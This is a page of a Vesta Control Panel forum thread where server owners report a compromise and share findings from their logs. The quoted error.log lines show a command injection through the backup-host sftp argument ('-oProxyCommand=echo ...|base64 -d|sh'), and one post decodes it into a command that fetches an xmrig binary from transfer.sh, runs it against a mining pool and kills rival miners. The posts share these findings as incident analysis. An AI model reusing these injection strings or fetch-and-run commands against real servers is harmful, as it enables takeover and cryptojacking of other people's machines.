Vesta Control Panel - Forum

Community Forum
https://forum.vestacp.com/

have been HACKED ! by xaxaxa.eu

https://forum.vestacp.com/viewtopic.php?f=10&t=17183

Page 5 of 5

Re: have been HACKED ! by xaxaxa.eu

Posted: Sun Jul 22, 2018 3:47 pm
by dkyadav008
cybersa wrote:
Mon Jul 02, 2018 10:26 am
 My Website was Hacked on Jun 22 around 11:10 PM UTC. My Server get upgraded to latest version automatically.But i think server was infected before that.

I have removed the miner file under /tmp/xmrig. Then i have analyzed the log of server to find the root cause and found following things:

1. No new user(sysroot) has been created as mentioned in the first post's script.
2. No New Cron Jobs has been added.
3. xmrig was ran with this cmd:

Code: Select all

./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=1 --donate-level=1 --background
4. Found this log in /var/log/vesta/error.log

Code: Select all

2018-06-22 23:13:28 v-add-backup-host  'sftp' 'xx' '"-oProxyCommand=echo Y2QgL3RtcDtwa2lsbCB4bXItc3Rhaztwa2lsbCB4bXJpZztybSAtZiB4bXJpZyB4bXItc3RhayBjcHUudHh0IHBvb2xzLnR4dCBjb25maWcudHh0O3dnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8geG1yaWcgaHR0cHM6Ly90cmFuc2Zlci5zaC9leXo0ei94bXJpZyYmY2htb2QgK3ggeG1yaWcmJi4veG1yaWcgLS1hbGdvPWNyeXB0b25pZ2h0IC0tdXJsPXBvb2wubWluZXhtci5jb206ODAgLS11c2VyPTQyeTFRRkJEU1ZtWFpidlpaOTVDTnBQb01kZExTNGRSUGRtaDlXZ0NSM3ZFNUQxYjJYcUdTVjVLb0JIdVBGU3VBalM3WXI3dHA0OGY5QU1WTFh1Z0R1VU1GbXA2dWdkIC0tdGhyZWFkPSQoZ3JlcCBwcm9jZXNzb3IgL3Byb2MvY3B1aW5mb3x3YyAtbCkgLS1kb25hdGUtbGV2ZWw9MSAtLWJhY2tncm91bmQgPC9kZXYvbnVsbCAyPiYxID4vZGV2L251bGwK|base64 -d|sh" x' '******' [Error 15]
Decode Version:

Code: Select all

cd /tmp;pkill xmr-stak;pkill xmrig;rm -f xmrig xmr-stak cpu.txt pools.txt config.txt;wget --no-check-certificate -qO xmrig https://transfer.sh/eyz4z/xmrig&&chmod +x xmrig&&./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=$(grep processor /proc/cpuinfo|wc -l) --donate-level=1 --background </dev/null 2>&1 >/dev/null
My OS: Ubuntu 16

FYI
@ScIT

no new user but I also found /var/log/vesta/error.log errors in it with logs it run once after upgrading to 22 version also.

Code: Select all

2018-07-12 22:48:01 v-add-backup-host  'sftp' 'xx' '"-oProxyCommand=echo ZWNobyAnIyEvYmluL3NoJz4uLi8uLi9iaW4vdi11cGRhdGUtc3lzLXZlc3RhO2NkIC90bXA7cGtpbGwgeG1yLXN0YWs7cGtpbGwgeG1yaWc7cm0gLWYgeG1yaWcgeG1yLXN0YWsgY3B1LnR4dCBwb29scy50eHQgY29uZmlnLnR4dDt3Z2V0IC0tbm8tY2hlY2stY2VydGlmaWNhdGUgLXFPIHhtcmlnIGh0dHBzOi8vdHJhbnNmZXIuc2gvY3NsRGIveG1yaWcmJmNobW9kICt4IHhtcmlnJiYuL3htcmlnIC0tYWxnbz1jcnlwdG9uaWdodCAtLXVybD14bXItZXUkKCgoJCQlMikrMSkpLm5hbm9wb29sLm9yZzoxNDQ0NCAtLXVzZXI9NDJ5MVFGQkRTVm1YWmJ2Wlo5NUNOcFBvTWRkTFM0ZFJQZG1oOVdnQ1IzdkU1RDFiMlhxR1NWNUtvQkh1UEZTdUFqUzdZcjd0cDQ4ZjlBTVZMWHVnRHVVTUZtcDZ1Z2QgLS10aHJlYWQ9JChncmVwIHByb2Nlc3NvciAvcHJvYy9jcHVpbmZvfHdjIC1sKSAtLWRvbmF0ZS1sZXZlbD0xIC0tYmFja2dyb3VuZCA8L2Rldi9udWxsIDI+JjEgPi9kZXYvbnVsbAo=|base64 -d|sh" x' '******' [Error 15]

Code: Select all

2018-07-13 07:39:36 v-add-backup-host  'sftp' 'xx' '"-oProxyCommand=echo ZWNobyAnIyEvYmluL3NoJz4uLi8uLi9iaW4vdi11cGRhdGUtc3lzLXZlc3RhO2NkIC90bXA7cGtpbGwgeG1yLXN0YWs7cGtpbGwgeG1yaWc7cm0gLWYgeG1yaWcgeG1yLXN0YWsgY3B1LnR4dCBwb29scy50eHQgY29uZmlnLnR4dDt3Z2V0IC0tbm8tY2hlY2stY2VydGlmaWNhdGUgLXFPIHhtcmlnIGh0dHBzOi8vdHJhbnNmZXIuc2gvYnpTQUgveG1yaWcmJmNobW9kICt4IHhtcmlnJiYuL3htcmlnIC0tYWxnbz1jcnlwdG9uaWdodCAtLXVybD14bXItZXUkKCgoJCQlMikrMSkpLm5hbm9wb29sLm9yZzoxNDQ0NCAtLXVzZXI9NDJ5MVFGQkRTVm1YWmJ2Wlo5NUNOcFBvTWRkTFM0ZFJQZG1oOVdnQ1IzdkU1RDFiMlhxR1NWNUtvQkh1UEZTdUFqUzdZcjd0cDQ4ZjlBTVZMWHVnRHVVTUZtcDZ1Z2QgLS10aHJlYWQ9JChncmVwIHByb2Nlc3NvciAvcHJvYy9jcHVpbmZvfHdjIC1sKSAtLWRvbmF0ZS1sZXZlbD0xIC0tYmFja2dyb3VuZCA8L2Rldi9udWxsIDI+JjEgPi9kZXYvbnVsbAo=|base64 -d|sh" x' '******' [Error 15]

Code: Select all

2018-07-22 17:02:00 v-add-backup-host  'sftp' 'xx' '"-oProxyCommand=echo ZWNobyAnIyEvYmluL3NoJz4uLi8uLi9iaW4vdi11cGRhdGUtc3lzLXZlc3RhO2NkIC90bXA7cGtpbGwgeG1yLXN0YWs7cGtpbGwgeG1yaWc7cm0gLWYgeG1yaWcgeG1yLXN0YWsgY3B1LnR4dCBwb29scy50eHQgY29uZmlnLnR4dDt3Z2V0IC0tbm8tY2hlY2stY2VydGlmaWNhdGUgLXFPIHhtcmlnIGh0dHBzOi8vdHJhbnNmZXIuc2gvRmRPSU4veG1yaWcmJmNobW9kICt4IHhtcmlnJiYuL3htcmlnIC0tYWxnbz1jcnlwdG9uaWdodCAtLXVybD14bXItZXUkKCgoJCQlMikrMSkpLm5hbm9wb29sLm9yZzoxNDQ0NCAtLXVzZXI9NDJ5MVFGQkRTVm1YWmJ2Wlo5NUNOcFBvTWRkTFM0ZFJQZG1oOVdnQ1IzdkU1RDFiMlhxR1NWNUtvQkh1UEZTdUFqUzdZcjd0cDQ4ZjlBTVZMWHVnRHVVTUZtcDZ1Z2QgLS10aHJlYWQ9JChncmVwIHByb2Nlc3NvciAvcHJvYy9jcHVpbmZvfHdjIC1sKSAtLWRvbmF0ZS1sZXZlbD0xIC0tYmFja2dyb3VuZCA8L2Rldi9udWxsIDI+JjEgPi9kZXYvbnVsbAo=|base64 -d|sh" x' '******' [Error 15]
All times are UTC
Page 5 of 5
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/